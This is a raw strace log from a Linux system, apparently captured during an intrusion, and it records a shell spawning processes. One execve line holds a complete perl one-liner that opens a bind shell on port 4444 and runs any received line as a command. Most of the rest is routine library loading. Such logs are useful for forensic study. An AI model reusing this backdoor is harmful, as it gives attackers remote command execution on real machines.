\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10615 07:33:52.866472 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10615 07:33:52.866490 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d4d000

10615 07:33:52.866502 mmap2(0xb7d54000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d54000

10615 07:33:52.866520 close(1)          = 0

10615 07:33:52.866532 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10615 07:33:52.866545 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10615 07:33:52.866560 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10615 07:33:52.866647 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

10615 07:33:52.866668 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d35000

10615 07:33:52.866680 mmap2(0xb7d49000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d49000

10615 07:33:52.866695 mmap2(0xb7d4b000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d4b000

10615 07:33:52.866709 close(1)          = 0

10615 07:33:52.866735 munmap(0xb7edb000, 29913) = 0

10615 07:33:52.866753 open("/etc/ld.so.cache", O_RDONLY) = 1

10615 07:33:52.866765 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10615 07:33:52.866782 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7edb000

10615 07:33:52.866792 close(1)          = 0

10615 07:33:52.866802 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10615 07:33:52.866817 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10615 07:33:52.866831 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10615 07:33:52.866941 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10615 07:33:52.866960 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d2b000

10615 07:33:52.866972 mmap2(0xb7d33000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d33000

10615 07:33:52.866988 close(1)          = 0

10615 07:33:52.867001 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10615 07:33:52.867015 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10615 07:33:52.867029 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10615 07:33:52.867119 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10615 07:33:52.867136 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d20000

10615 07:33:52.867147 mmap2(0xb7d29000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d29000

10615 07:33:52.867166 close(1)          = 0

10615 07:33:52.867187 munmap(0xb7edb000, 29913) = 0

10615 07:33:52.867203 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10615 07:33:52.867218 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10615 07:33:52.867230 _llseek(1, 0, [0], SEEK_CUR) = 0

10615 07:33:52.867242 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10615 07:33:52.867258 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7ee2000

10615 07:33:52.867269 _llseek(1, 1624, [1624], SEEK_SET) = 0

10615 07:33:52.867284 munmap(0xb7ee2000, 1624) = 0

10615 07:33:52.867293 close(1)          = 0

10615 07:33:52.867321 getpgrp()         = 3831

10615 07:33:52.867332 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10615 07:33:52.867347 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10615 07:33:52.867363 brk(0x8101000)    = 0x8101000

10615 07:33:52.867404 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10615 07:33:52.867420 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10615 07:33:52.867435 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10615 07:33:52.867472 brk(0x8102000)    = 0x8102000

10615 07:33:52.867500 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10615 07:33:52.867518 stat64("/sbin/AB", 0xbfaa68f8) = -1 ENOENT (No such file or directory)

10615 07:33:52.867531 stat64("/bin/AB", 0xbfaa68f8) = -1 ENOENT (No such file or directory)

10615 07:33:52.867542 stat64("/usr/sbin/AB", 0xbfaa68f8) = -1 ENOENT (No such file or directory)

10615 07:33:52.867554 stat64("/usr/bin/AB", 0xbfaa68f8) = -1 ENOENT (No such file or directory)

10615 07:33:52.867567 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10615 07:33:52.867581 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d566f8) = 10616

10616 07:33:52.867626 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10616 07:33:52.867642 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10616 07:33:52.867655 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10616 07:33:52.867667 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10616 07:33:52.867683 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10616 07:33:52.867699 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10616 07:33:52.867711 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10616 07:33:52.867766 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10616 07:33:52.867780 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10616 07:33:52.867847 exit_group(127)   = ?

10615 07:33:52.879428 rt_sigprocmask(SIG_SETMASK, [],  <unfinished ...>

4519  07:33:52.879456 waitpid(10615,  <unfinished ...>

10615 07:33:52.879499 <... rt_sigprocmask resumed> NULL, 8) = 0

10615 07:33:52.888857 --- SIGCHLD (Child exited) @ 0 (0) ---

10615 07:33:52.888857 waitpid(-1, [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10616

10615 07:33:52.888857 waitpid(-1, 0xbfaa6578, WNOHANG) = -1 ECHILD (No child processes)

10615 07:33:52.888858 sigreturn()       = ? (mask now [])

10615 07:33:52.888858 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10615 07:33:52.888858 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10615 07:33:52.888858 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10615 07:33:52.888858 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10615 07:33:52.888859 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10615 07:33:52.888859 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10615 07:33:52.888889 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10615 07:33:52.888909 stat64("/sbin/perl", 0xbfaa6928) = -1 ENOENT (No such file or directory)

10615 07:33:52.888921 stat64("/bin/perl", 0xbfaa6928) = -1 ENOENT (No such file or directory)

10615 07:33:52.888932 stat64("/usr/sbin/perl", 0xbfaa6928) = -1 ENOENT (No such file or directory)

10615 07:33:52.888944 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10615 07:33:52.888963 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10615 07:33:52.888987 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10615 07:33:52.889001 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d566f8) = 10617

10617 07:33:52.889048 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10617 07:33:52.889064 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10617 07:33:52.889077 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10617 07:33:52.889100 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10617 07:33:52.889116 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10617 07:33:52.889131 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10617 07:33:52.889144 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10617 07:33:52.889177 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10617 07:33:52.889260 brk(0)            = 0x8153000

10617 07:33:52.889280 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10617 07:33:52.889295 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7f0f000

10617 07:33:52.889311 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10617 07:33:52.889328 open("/etc/ld.so.cache", O_RDONLY) = 1

10617 07:33:52.889341 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10617 07:33:52.889358 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7f07000

10617 07:33:52.889368 close(1)          = 0

10617 07:33:52.889379 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10617 07:33:52.889395 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10617 07:33:52.889409 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10617 07:33:52.889501 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10617 07:33:52.889519 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7f03000

10617 07:33:52.889531 mmap2(0xb7f05000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7f05000

10617 07:33:52.889547 close(1)          = 0

10617 07:33:52.889559 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10617 07:33:52.889572 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10617 07:33:52.889595 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10617 07:33:52.889687 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10617 07:33:52.889704 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ede000

10617 07:33:52.889716 mmap2(0xb7f01000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7f01000

10617 07:33:52.889732 close(1)          = 0

10617 07:33:52.889744 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10617 07:33:52.889757 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

10617 07:33:52.889772 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

10617 07:33:52.889858 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

10617 07:33:52.889875 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7edd000

10617 07:33:52.889888 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ec5000

10617 07:33:52.889899 mmap2(0xb7ed9000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7ed9000

10617 07:33:52.889913 mmap2(0xb7edb000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7edb000

10617 07:33:52.889927 close(1)          = 0

10617 07:33:52.889939 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10617 07:33:52.889952 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10617 07:33:52.889966 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10617 07:33:52.890054 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10617 07:33:52.890075 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d76000

10617 07:33:52.890094 mmap2(0xb7ebf000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7ebf000

10617 07:33:52.890145 mmap2(0xb7ec2000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7ec2000

10617 07:33:52.890158 close(1)          = 0

10617 07:33:52.890171 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10617 07:33:52.890184 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

10617 07:33:52.890199 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\17\0\0\0\22\0\0\0\2\0\0\0\6\0\0\0\4\311\240, 